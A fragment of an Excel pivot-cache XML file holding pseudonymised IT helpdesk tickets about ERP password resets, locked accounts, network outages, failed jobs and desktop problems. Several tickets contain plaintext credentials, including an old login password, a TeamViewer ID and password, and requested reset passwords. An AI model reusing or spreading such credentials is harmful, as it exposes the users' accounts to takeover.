  </r>
  <r>
    <s v="erp printer rerouting"/>
    <s v="name:uicjxvng jcoshmbf_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:uicjxvng.jcoshmbf@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i need to change my default printer in erp for transactions co01 and co02. despite changing my default in su3, they are still printing to the wrong printer."/>
    <s v="uicjxvng jcoshmbf"/>
    <x v="4"/>
  </r>
  <r>
    <s v="interface: fastethernet0/48 cisco aircap 3702 on company-na-usa-usa-idf-2-b-2960-access-sw02.company.com is down "/>
    <s v=" interface: fastethernet0/48 cisco aircap 3702 on company-na-usa-usa-idf-2-b-2960-access-sw02.company.com is down since 10:12 am et on 10/14."/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to open SID_1 and password issue in SID_21"/>
    <s v="unable to open SID_1 and password issue in SID_21"/>
    <s v="rtpcnyhq ceqmwkhi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bobj"/>
    <s v="_x000a__x000a_received from: yhtdon.zdyhazula@company.com_x000a__x000a_i am having difficulty obtaining data from bobj which i must have this morning. are there any issues being reported? if not, could someone please call me._x000a_"/>
    <s v="ijplstng juybetlo"/>
    <x v="8"/>
  </r>
  <r>
    <s v="erp password locked out after updating passwords with password_management_tool password manager"/>
    <s v="everything else works.  just erp SID_34 is locked out."/>
    <s v="fjhqiwau gvkiuanl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to hub to check pay statements "/>
    <s v="unable to login to hub to check pay statements "/>
    <s v="wrdmxloh dshplynj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_106:windows disk space utilization alert :utiliuytretion is 85%,free space available is 15% under 3gb."/>
    <s v="HostName_106:windows disk space utilization alert :utiliuytretion is 85%,free space available is 15% under 3gb."/>
    <s v="utyeofsk rdyzpwhi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="problem with erp sales info"/>
    <s v="_x000a__x000a_received from: vkzwafuh.tcjnuswg@gmail.com_x000a__x000a_hi,_x000a_i am having trouble getting erp sales info. there are no figures in the fields when i pull up a report._x000a__x000a_vkzwafuh tcjnuswg - cmp_x000a_sr. application eng._x000a_vkzwafuh.tcjnuswg@gmail.com_x000a__x000a__x000a__x000a_from: suthye kinght_x000a_sent: wednesday, october 12, 2016 1:23 pm_x000a_to: vkzwafuh tcjnuswg &lt;vkzwafuh.tcjnuswg@gmail.com&gt;_x000a_cc: sntvfpbl vtokgley &lt;sntvfpbl.vtokgley@gmail.com&gt;_x000a_subject: re: erp sales info_x000a__x000a_hi stuarthsyt,_x000a__x000a_you may have to put an it ticket in to get this fixed._x000a__x000a_"/>
    <s v="vkzwafuh tcjnuswg"/>
    <x v="8"/>
  </r>
  <r>
    <s v="unable to create skype meetings onbehalf of tomashtgd mchectg"/>
    <s v="unable to create skype meetings on behalf of tomashtgd mchectg"/>
    <s v="ztnpeshl vmdyglqn"/>
    <x v="26"/>
  </r>
  <r>
    <s v="interface1/0/40 is down on switch company-eu-deu-germany-emsw03-2960s-access-sw03 since 9:44 am et on 10/14."/>
    <s v="interface1/0/40 is down on switch company-eu-deu-germany-emsw03-2960s-access-sw03 since 9:44 am et on 10/14."/>
    <s v="bozdftwx smylqejw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="issues viewing drawings."/>
    <s v="issues viewing drawings.  please see the attached document with the error messages."/>
    <s v="dctvfjrn oypnxftq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="a kÃ¼ndigung for dxnzkcuh eqdgoxap, 11161751, effective 13.10.2016 has been approved. "/>
    <s v="hello , _x000d__x000a__x000d__x000a_a kÃ¼ndigung for dxnzkcuh eqdgoxap, 11161751, effective 13.10.2016 has been approved. _x000d__x000a__x000d__x000a_click the link to view. _x000d__x000a_"/>
    <s v="ucawbivs ountxzir"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to see all the tabs under ess"/>
    <s v="unable to see all the tabs under ess"/>
    <s v="uiotbkhs grymzxiq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="let's talk video is not playing."/>
    <s v="let's talk video is not playing."/>
    <s v="ghuwlrqk tzgbolhk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i cannot access ethics portal"/>
    <s v="i have recently switched account from company.com to company.com, now, whilst i'm able to log into the hub with the new credentials, when i try to log into the ethics portal i get this message:_x000a_&quot;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quot;_x000a__x000a_giuliasana byhdderni - bernig_x000a__x000a_"/>
    <s v="ajnpuqym gvoncems"/>
    <x v="23"/>
  </r>
  <r>
    <s v="issue with microsoft office - key entry."/>
    <s v="_x000d__x000a__x000d__x000a_received from: hcyemunl.lnecsgpd@gmail.com_x000d__x000a__x000d__x000a_hi  it team,_x000d__x000a__x000d__x000a_here with enclosed the screen shot. it says this copy of microsoft office professional is not activated. please suggest what to be done for key entry for activation. this popup comes automatically after i login to ms outlook._x000d__x000a__x000d__x000a_best "/>
    <s v="hcyemunl lnecsgpd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update for-ticket_no0448195"/>
    <s v="user called to inform that she was kicked out of eu remote after 50 minutes and now she is connected to na its working fine "/>
    <s v="gzjtweph mnslwfqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering tool will not open"/>
    <s v="mathrv macyhtkey, - my engineering tool client will not open. i am getting an error message, &quot;cannot continue. the application is improperly formatheywted. contact the application vendor for assistance&quot;. i have uninstalled and re-installed several times."/>
    <s v="ndyrowef biwecrgx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need access to vpn "/>
    <s v="need access to vpn computer name-lcvl7406035"/>
    <s v="txjwyami fhlgpsim"/>
    <x v="33"/>
  </r>
  <r>
    <s v="job Job_1653 failed in job_scheduler at: 10/14/2016 08:43:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1653 failed in job_scheduler at: 10/14/2016 08:43:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="error message trying to log into purchasing to order"/>
    <s v="error message trying to log into purchasing to order - user id - cuthyunniy _x000a_i have attached the email that shows the errors i am receiving_x000a_"/>
    <s v="mohryldw meutqjzy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset request."/>
    <s v="password reset request."/>
    <s v="htwsufnv zaguhmki"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blocked out from expense report"/>
    <s v="blocked out from expense report"/>
    <s v="ikgrtwhz tmqdiwge"/>
    <x v="0"/>
  </r>
  <r>
    <s v="some confidential document was shared on the hub and everyone had access to it."/>
    <s v="some confidential document was shared on the hub and everyone had access to it._x000a__x000a_link : &lt;_x000a__x000a_mikhghytr_x000a_this is an issue._x000a__x000a_sent from my iphone_x000a__x000a_begin forwarded message:_x000a_from: efdhrlwv aoxtugzr &lt;efdhrlwv.aoxtugzr@gmail.com&gt;_x000a_date: october 14, 2016 at 5:00:02 am edt_x000a_to: aedwrpvo qbpafrsx &lt;aedwrpvo.qbpafrsx@gmail.com&gt;, aqritplu beuflorc &lt;aqritplu.beuflorc@gmail.com&gt;, &lt;bnsaqekm.xoglfeij@gmail.com&gt;,  itclukpe aimcfeko &lt;itclukpe.aimcfeko@gmail.com&gt;, yjscozva lyjoeacv &lt;yjscozva.lyjoeacv@gmail.com&gt;_x000a_subject: confidential information on the hub_x000a_this was brought to my attention this morning by kpudhygb vnizrdeb. if you search &quot;usa jobs&quot; on the hub, this information is in the results field. just thought you all might want to know._x000a_open: _x000a_&lt;_x000a__x000a__x000a_"/>
    <s v="azxhejvq fyemlavd"/>
    <x v="15"/>
  </r>
  <r>
    <s v="request you to reset my erp password"/>
    <s v="_x000d__x000a__x000d__x000a_received from: dshferby.houtnzdi@gmail.com_x000d__x000a__x000d__x000a_"/>
    <s v="dshferby houtnzdi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa backup exec server rgtsm005 has a filed raid hdd physical disk 0:0:2 "/>
    <s v="usa backup exec server rgtsm005 has a filed raid hdd physical disk 0:0:2 "/>
    <s v="zbhfrsto vhgtoxib"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to open outlook and mobile device activation"/>
    <s v="unable to open outlook and mobile device activation"/>
    <s v="vzrbocfl wxtpoyez"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please reset password  in SID_34   for user id : maihtyrhu"/>
    <s v="please reset password  in SID_34   for user id : maihtyrhu"/>
    <s v="ikerxqwz prkyuitl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user id &amp; password fail"/>
    <s v="_x000a__x000a_received from: yxliakph.soucfnqe@gmail.com_x000a__x000a_dear sir,_x000a_one apprentice,mr.suniythulkuujmar,nk,is unable to view his salary statements due to user id &amp; password fail._x000a_pl. help to recover the same._x000a_old  id:vvkhyhums16_x000a_old password:dhad7wuz_x000a__x000a_with "/>
    <s v="yxliakph soucfnqe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telefon defekt"/>
    <s v="telefon defekt"/>
    <s v="sxabotdw xlozwcyk"/>
    <x v="32"/>
  </r>
  <r>
    <s v="invoicing error"/>
    <s v="invoicing error"/>
    <s v="yhmwxsqj ugnthxky"/>
    <x v="12"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="gwmspqeo vwfetaqg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype account login problem"/>
    <s v="name:ilypdtno mkdfetuq_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:ilypdtno.mkdfetuq@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:skype account login problem_x000a__x000a__________________x000a__x000a_ic_x000a_ welcome, our next available agent will be with you shortly..._x000a_ interaction alerting agent._x000a_ website visitor has joined the conversation_x000a_dwfiykeo argtxmvcumar3_x000a_ hello_x000a_ilypdtno mkdfetuq_x000a_ hi ..am facing problem in signing in skype account_x000a_dwfiykeo argtxmvcumar3_x000a_ please provide me id &amp; password for team viewer_x000a_ilypdtno mkdfetuq_x000a_ id :747 077 476_x000a_ password :2364_x000a_dwfiykeo argtxmvcumar3_x000a_ working now_x000a_ilypdtno mkdfetuq_x000a_ yup "/>
    <s v="ilypdtno mkdfetuq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the plm services is reporting a : down status on, HostName_1032"/>
    <s v="the plm services is reporting a : down status on, HostName_1032"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="monitor tauschen \dhoalycb yopvwrjq"/>
    <s v="monitor tauschen \dhoalycb yopvwrjq"/>
    <s v="dhoalycb yopvwrjq"/>
    <x v="24"/>
  </r>
  <r>
    <s v="password is not getting synchronized."/>
    <s v="password is not getting synchronized."/>
    <s v="bgohnwer ybinfojr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable login ethics"/>
    <s v="_x000d__x000a__x000d__x000a_received from: igdnsjhz.awnftgev@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i'm company apac company location it. many of our users didn't receive the email for ethics training of fy17 q2. but all of them have completed ethics training of fy17 q1. i found when they log into ethics, it will be displayed below hint_x000d__x000a__x000d__x000a__x000d__x000a_        [cid:image002.jpg@01d22638.3c313e90]_x000d__x000a__x000d__x000a__x000d__x000a_please help us change the user's ethics status back to correct setting. "/>
    <s v="igdnsjhz awnftgev"/>
    <x v="23"/>
  </r>
  <r>
    <s v="circuit outage:company-na-usa-usa-mpls-2811-rtr01 is down at 4:10 am et on 10/14."/>
    <s v="what type of outage:  _____network     ____x_circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____yes____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______4:10 am et on 10/14.________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? _____no__    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ____na___    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  ____yes__    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ___yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _______na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_global_telecom_1__000000223023260__________________       _x000d__x000a__x000d__x000a_12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="bozdftwx smylqejw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="install office2010 \ ewel8323894 \qidgvtwa qvbutayx"/>
    <s v="install office2010 \ ewel8323894 \qidgvtwa qvbutayx"/>
    <s v="qidgvtwa qvbutayx"/>
    <x v="24"/>
  </r>
  <r>
    <s v="quote save / material creation process for configured items with quoting engine broken"/>
    <s v="quote save in erp SID_34 broken for configured items with erp vc (quoting engine). it only generates an error message &quot;line item -&gt; 10 specify positive values only. _x000d__x000a_it seems to be a change in erp SID_34 yesterday, oct. 13, between 8pm and 11 pm est (server time). we noticed there is a break in the material number sequence. all mm's younger than 11pm does not exists in SID_34 neither in SID_1 or SID_21."/>
    <s v="iavozegx jpcudyfi"/>
    <x v="20"/>
  </r>
  <r>
    <s v="setup new ws \batuhan gueduel"/>
    <s v="setup new ws \batuhan gueduel"/>
    <s v="kglnimxw nhdqaupz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \szockfpj izohlgcq"/>
    <s v="setup new ws \szockfpj izohlgcq"/>
    <s v="szockfpj izohlgcq"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \qdztknml hpcxnyrq"/>
    <s v="setup new ws \qdztknml hpcxnyrq"/>
    <s v="qdztknml hpcxnyrq"/>
    <x v="24"/>
  </r>
  <r>
    <s v="reporting_tool dashbankrd not appearing in my crm page"/>
    <s v="_x000a__x000a_received from: xfdkwusj.gyklresa@gmail.com_x000a__x000a_hello_x000a_though connected â€“ the reporting_engineering_tool is not shown_x000a__x000a_[cid:image001.jpg@01d22601.f9d82300]_x000a__x000a_xfdkwusj gyklresa_x000a_sales manager earthworks european served area - south_x000a_xfdkwusj.gyklresa@gmail.com&lt;mailto:xfdkwusj.gyklresa@gmail.com&gt;_x000a__x000a__x000a_please note our new telephone number and company address effective 22.08.2016._x000a_*********************************************_x000a__x000a_company infrastructure gmbh_x000a_geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx und naruedlk mpvhakdq_x000a__x000a__x000a__x000a_"/>
    <s v="xfdkwusj gyklresa"/>
    <x v="22"/>
  </r>
  <r>
    <s v="cannot add the lean event"/>
    <s v="i cannot launch 'add the lean event icon' in collaboration_platform. request you to install microsoft 2013 version of it._x000d__x000a_attached is the error for your reference"/>
    <s v="svdefgwl sgtmurfh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account zugriff  dyqekzuc djhznybt wiederherstellen - dringend"/>
    <s v="_x000d__x000a__x000d__x000a_received from: urpbyoke.vwcbhmds@gmail.com_x000d__x000a__x000d__x000a_dyqekzuc djhznybt sitzt neben mir. er kann seinen account nicht mehr Ã¶ffnen._x000d__x000a__x000d__x000a_viele grÃ¼ÃŸe, best "/>
    <s v="urpbyoke vwcbhmds"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problem with laptop- latitude 7350"/>
    <s v="_x000a__x000a_received from: ybxsujwi.yzwanorl@gmail.com_x000a__x000a_dear sir ,_x000a__x000a_i have got multiple problems with the laptop_x000a_1.instant shaking of the screen_x000a_2.mails before 1 month cannot be seen unless refreshed ._x000a_3. slow in processing_x000a__x000a_please do the needful and get me out of this proms_x000a__x000a__x000a_"/>
    <s v="ybxsujwi yzwanorl"/>
    <x v="18"/>
  </r>
  <r>
    <s v="reset the password for imjwbogq xfizlnap on erp / production / erp"/>
    <s v="please reset password to 'daypay3'"/>
    <s v="imjwbogq xfizlnap"/>
    <x v="0"/>
  </r>
  <r>
    <s v="a next issue to bobj account dbednyuarski"/>
    <s v="_x000d__x000a__x000d__x000a_received from: pgacouel.mpgfkxwr@gmail.com_x000d__x000a__x000d__x000a_hell o,_x000d__x000a_a next issue to bob j doesn't work on my account_x000d__x000a_[cid:image001.png@01d225fa.3fb2a650]_x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="pgacouel mpgfkxwr"/>
    <x v="8"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked."/>
    <s v="dyqekzuc djhznybt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook freezes after crm update."/>
    <s v="outlook freezes after crm update."/>
    <s v="axdyfojg nyjlxbsk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit der anzeige von offenen emails"/>
    <s v="_x000a__x000a_received from: ecoljnvt.lbdqmvfs@gmail.com_x000a__x000a_hallo ,_x000a__x000a_seit einiger zeit werden in meinem outlook nicht mehr alle offenen email angezeigt._x000a__x000a_[cid:image003.jpg@01d225f8.ca2168f0]_x000a__x000a_ich muss immer erst auf das blau unterlegte hinweisfeld drÃ¼cken um weitere emails sehen zu kÃ¶nnen._x000a_das geht aber nur wenn ich eine verbindung zum exchange server habe._x000a_da das nicht immer gegeben ist, bitte entsprechend einstellen, dass ich alle emails immer lesen kann._x000a__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="ecoljnvt lbdqmvfs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="è€ƒå‹¤ç³»ç»Ÿè¿›ä¸åŽ»è¯·å¤„ç†è°¢è°¢ï¼"/>
    <s v="è€ƒå‹¤ç³»ç»Ÿè¿›ä¸åŽ»è¯·å¤„ç†è°¢è°¢ï¼"/>
    <s v="spgdcvhb ocagnpmj"/>
    <x v="30"/>
  </r>
  <r>
    <s v="telephony_software - issue very bad quality - 1064832909"/>
    <s v="the sound is horrible - customer was very hard to understand. i asked him whether he has this issue, too. not on his side of the line - he said."/>
    <s v="gmwdvrou aupnvems"/>
    <x v="6"/>
  </r>
  <r>
    <s v="engineering tool and erp not working "/>
    <s v="engineering tool and erp not working "/>
    <s v="hukefojy sdquiely"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need help in resetting password in password_management_tool"/>
    <s v="need help in resetting password in password_management_tool"/>
    <s v="axdyfojg nyjlxbsk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need extra awb copy for all vendor"/>
    <s v="_x000a__x000a_received from: rxoynvgi.ntgdsehl@gmail.com_x000a__x000a_hi it team_x000a__x000a_kindly please assist as we need extra (mother) awb copy when closing all shipment for all vendor carriers for audit purpose. "/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="17"/>
  </r>
  <r>
    <s v="www.company.com &amp; www.company.com  are showing down in monitoring_tool "/>
    <s v="observing below alerts in monitoring_tool since 12:14 am on 10/14 et:_x000d__x000a__x000d__x000a_the www.company.com is reporting a : down status on, ec2-52-5-56-105.compute-1.amazonaws.com. please investigate _x000d__x000a_the www.company.com is reporting a : down status on, ec2-52-5-56-105.compute-1.amazonaws.com. please investigate "/>
    <s v="jloygrwh acvztedi"/>
    <x v="50"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="blksigdy nzapgrlx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="standby laptop for mcae course 5 day 17th to 21st oct"/>
    <s v="_x000a__x000a_received from: rnueobcz.lwhcbati@gmail.com_x000a__x000a_dear saravthsyana,_x000a__x000a_we need a standby laptop at  hall-1 for our 5 day mcae course._x000a_should have microsoft office, adobe reader &amp; vlc to run the show._x000a__x000a_please make it ready today i will collect it at 17th morning 8 am from your dept._x000a__x000a_thanking you_x000a_"/>
    <s v="rnueobcz lwhcbati"/>
    <x v="18"/>
  </r>
  <r>
    <s v="job Job_3052 failed in job_scheduler at: 10/13/2016 23:22:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3052 failed in job_scheduler at: 10/13/2016 23:22:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp working slow"/>
    <s v="_x000a__x000a_received from: rayhtukumujar.br2@company.com_x000a__x000a_hello,_x000a__x000a_erp working is very slow since yesterday morning.  but no action has been taken yet.  please raise a sev2 ticket and arrange to resolve the issue immediately._x000a__x000a_booking of orders &amp; resolving customer's queries are getting delayed due to this.  await your immediate feedback._x000a__x000a_à²•à³ƒà²¤à²œà³à²žà²¤à³†à²—à²³à³  / with "/>
    <s v="fgdsvija qvixmubh"/>
    <x v="13"/>
  </r>
  <r>
    <s v="business_client - authorisation"/>
    <s v="_x000a__x000a_received from: vomtbcej.lyiwqrct@gmail.com_x000a__x000a_hello;_x000a__x000a_pl. provide business_client authorization for checking/downloading drawings._x000a__x000a_employee id: 20295658_x000a__x000a__x000a_"/>
    <s v="vomtbcej lyiwqrct"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_562 failed in job_scheduler at: 10/13/2016 22:21:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_562 failed in job_scheduler at: 10/13/2016 22:21:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job bkwin_HostName_770_inc failed in job_scheduler at: 10/13/2016 21:46:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_HostName_770_inc failed in job_scheduler at: 10/13/2016 21:46:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="error _ sto from plant_44 to plant_55"/>
    <s v="when creating sto to return complained goods from plant_44 to plant_55, we found the error message as below, please help fixing this issue and advise back to us aerp. "/>
    <s v="tqfnalpj qyoscnge"/>
    <x v="29"/>
  </r>
  <r>
    <s v="so#36131539 / condition type"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qgvbalix.smehqkyj@gmail.com_x000d__x000a__x000d__x000a_hello it team,_x000d__x000a__x000d__x000a_we are not able to change the condition type for pos. 20, 50 and 60 in so#36131539._x000d__x000a_please check and advise me._x000d__x000a__x000d__x000a_"/>
    <s v="qgvbalix smehqkyj"/>
    <x v="12"/>
  </r>
  <r>
    <s v="job SID_43filesys failed in job_scheduler at: 10/13/2016 20:38:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_43filesys failed in job_scheduler at: 10/13/2016 20:38:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ticket update on inplant_869308"/>
    <s v="ticket update on inplant_869308"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="show me the text that is written on the email that has been quarantined below? "/>
    <s v="show me the text that is written on the email that has been quarantined below? _x000d__x000a__x000d__x000a_from: uisewznr ewtmkphs _x000d__x000a_sent: friday, october 14, 2016 3:04 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: fw: notification: fwd: needed material drawing_x000d__x000a__x000d__x000a_hi team,_x000d__x000a__x000d__x000a_can you please show me the text that is written on the email that has been quarantined below? "/>
    <s v="uisewznr ewtmkphs"/>
    <x v="26"/>
  </r>
  <r>
    <s v="unable to submit expense report"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vxzahrlc.frtkpehy@gmail.com_x000d__x000a__x000d__x000a_could someone please call me. i have tried to call it and it keeps disconnecting._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="vxzahrlc frtkpehy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to install engineering_tool"/>
    <s v="unable to install engineering_tool"/>
    <s v="eagvusbr nguqityl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="order shipped ups ground"/>
    <s v="_x000d__x000a__x000d__x000a_from: tjlgzkbp iervwjzg _x000d__x000a_sent: thursday, october 13, 2016 10:37 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: ran fw: freight charge for cesco inwarehouse_tool 0159299348_x000d__x000a__x000d__x000a_ref: sales doc 36128707_x000d__x000a__x000d__x000a_order shipped ups groundâ€¦.1 poundâ€¦.shipping verified freight cost in kis is $17.78._x000d__x000a_inwarehouse_tool 0159299348 shows $34.68â€¦this is incorrect._x000d__x000a_please advise why the system applied the much higher, incorrect freight charge to their inwarehouse_tool._x000d__x000a_"/>
    <s v="tjlgzkbp iervwjzg"/>
    <x v="17"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0449295"/>
    <s v="ticket update on ticket_no0449295"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0449268"/>
    <s v="ticket update on ticket_no0449268"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_869259"/>
    <s v="ticket update on inplant_869259"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for bnoupaki cpeioxdz using password_management_tool password reset."/>
    <s v="the"/>
    <s v="bnoupaki cpeioxdz"/>
    <x v="16"/>
  </r>
  <r>
    <s v="impact awards email"/>
    <s v="from: nwqktzlx vnlqkgpb _x000a_sent: thursday, october 13, 2016 11:01 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject:  (phishing check?) fw: e"/>
    <s v="nwqktzlx vnlqkgpb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="expense report not going to correct manager"/>
    <s v="expense report not going to correct manager"/>
    <s v="lkecfram tweaokch"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to sync passwords on all accounts"/>
    <s v="unable to sync passwords on all accounts"/>
    <s v="dabkvsqt grtwfdxb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="rhpqxsuy vcukgdfe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot get prtqx7318 to print on pc rqxw8517736, drivers won't load."/>
    <s v="cannot get prtqx7318 to print on pc rqxw8517736, drivers won't load."/>
    <s v="vwaejqrh kmtvyesb"/>
    <x v="2"/>
  </r>
  <r>
    <s v="kpm issue / ie upgrade from 10 to ie11"/>
    <s v="kpm issue / ie upgrade from 10 to ie11"/>
    <s v="zywoxerf paqxtrfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="amssm003:volume: c:\ disk is over 88% space consumed."/>
    <s v="amssm003:volume: c:\ disk is over 88% space consumed. space available: 2.2 g"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="blank call //gso // loud noise"/>
    <s v="blank call //gso // loud noise"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp password reset  for user  kambthryes2 ( exlbkpoj vrkoqaje ) "/>
    <s v="please reset erp - password of kambthryes2 ( exlbkpoj vrkoqaje ) to â€ždaypay3&quot;"/>
    <s v="mrwucjho tjeaxnhu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset SID_39 password for jidhewlg jufskody"/>
    <s v="could you please reset the password for the user olthyivectr for SID_39 in erp? he is company sales manager and his password is not working and he needs this access due the channel partner programdnty._x000a__x000a_"/>
    <s v="gifpuwtb aykegsvr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_869231"/>
    <s v="ticket update on inplant_869231"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need verification of proper user id"/>
    <s v="xszoedmc gmhkdsnw,. approvals in purchasing are not working properly.  please verify that the proper samaccountname in ad is in lowercase for rxqtvanc kthqwxvb (tegdtyyp) and ethd yhtheehey (shyheehew2). "/>
    <s v="xszoedmc gmhkdsnw"/>
    <x v="19"/>
  </r>
  <r>
    <s v="outlook issue"/>
    <s v="outlook issue"/>
    <s v="pbfscenq qvaylkne"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lean tracker"/>
    <s v="_x000a__x000a_received from: sdbcpvtx.hzpctsla@gmail.com_x000a__x000a_mithyke tayjuoylor and arithel shfsako get this error when they try to open the 'add a lean event' button on their pcs._x000a__x000a__x000a_[cid:image001.png@01d2255d.a4b446f0]_x000a__x000a__x000a_"/>
    <s v="sdbcpvtx hzpctsla"/>
    <x v="0"/>
  </r>
  <r>
    <s v="msd - office 2013  specifically outlook"/>
    <s v="outlook is very slow to respond, i'm having to manually refresh to update._x000d__x000a__x000d__x000a_"/>
    <s v="pbfscenq qvaylkne"/>
    <x v="0"/>
  </r>
  <r>
    <s v="home folder share delegation of dtheb mulhylen (mullthyed) to lpoebzsc grknswyo (marthhty)"/>
    <s v="vip 1 // please usa user access to dtheb mulhylen's o:\ drive - full access_x000a__x000a_name : lpoebzsc grknswyo_x000a_email : lpoebzsc.grknswyo@gmail.com_x000a_telephone : _x000a_summary : as you may know, dtheb mulhylen will be retiring from company on october 28th.  please usa me access to her o:\ drive - full access"/>
    <s v="lpoebzsc grknswyo"/>
    <x v="19"/>
  </r>
  <r>
    <s v="res: ticket_no1558759 -- register - ie rj  tax code- in erp SID_34"/>
    <s v="_x000d__x000a__x000d__x000a_received from: lokiwfhg.udkoqrcg@gmail.com_x000d__x000a__x000d__x000a_hi all,_x000d__x000a_i already approved this by email, but i don't hear nothing about._x000d__x000a_could you please verify the status? its urgency in south_amerirtca._x000d__x000a_"/>
    <s v="lokiwfhg udkoqrcg"/>
    <x v="9"/>
  </r>
  <r>
    <s v="cannot download or print drawings from erp netweaver."/>
    <s v="_x000a_summary:hello! i cannot download or print drawings from erp netweaver."/>
    <s v="deqmzotr zhrjngbi"/>
    <x v="2"/>
  </r>
  <r>
